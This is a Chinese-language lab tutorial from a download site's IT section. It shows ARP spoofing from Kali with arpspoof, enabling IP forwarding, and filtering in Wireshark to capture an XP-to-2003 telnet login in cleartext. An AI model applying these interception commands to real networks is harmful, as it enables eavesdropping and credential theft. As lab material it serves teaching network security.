纯净、安全、绿色的下载网站

首页|软件分类|下载排行|最新软件|IT学院

当前位置:首页IT学院IT技术

Wireshark嗅探抓取telnet明文账户密码

听闻瓜子   2019-11-13 我要评论

0x00

Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

我们可以利用arpspoof拦截转发同一网段下其他用户流量,再使用Wireshark来分析查看流量

配置环境:

攻击端:kali 

靶机端:2003 xp

0x01

首先确保三台机在同一网段下

 

 

 

kali IP为192.168.1.3

XP IP为192.168.1.2

2003 IP为192.168.1.1

kali开启流量转发

cat /proc/sys/net/ipv4/ip_forward       查看浏览转发,如果是0就是没有开启,1是开启
0    可以看到没有开启
echo 1 > /proc/sys/net/ipv4/ip_forward      修改为1
这是时候我们的流量转发就能开启,别人的流量经过我这里也能转发出去

 

 接下来就是嗅探转发获取流量了

这里用到arpspoof来转发流量

arpspoof -i (自己网卡) -t  目标IP  网关

 

 打开Wireshark点开自己arpspoof配置的网卡

xp通过telnet连接2003

 

 回到Wireshark开始过滤

过滤规则

ip.addr==目标IP && tcp.port==23

 

 

 

 xp通过telnet连接2003时的明文账户密码直接暴露出来了


相关文章

猜您喜欢

  • win10小娜在哪 win10唤醒小娜方法

    Intel与微软联合开发了新的技术,搭载最新英特尔处理器的Win10电脑用户,可通过语音命令将设备从低功耗状态中唤醒,用户只需要喊出“你好小娜(Hey Cortana)”。英特尔在今年的年度开发者论坛大会(IDF 2015)中演示了这项名为“语音唤醒(Wake-on-voice)”的新技术。..
  • win10怎么关闭最近使用的文件 win10怎么关闭快速访问

    Windows10系统的“快速访问”功能很容易泄露电脑中的隐私,用什么方法可以让这个功能消失,避免电脑的个人隐私泄露呢?修改Windows10系统的注册表值取消“快速访问”泄露隐私的方法。..

网友评论

Copyright 2020 www.bkLsoft.com 【265下载】 版权所有 软件发布

声明:所有软件和文章来自软件开发商或者作者 如有异议 请与本站联系 点此查看联系方式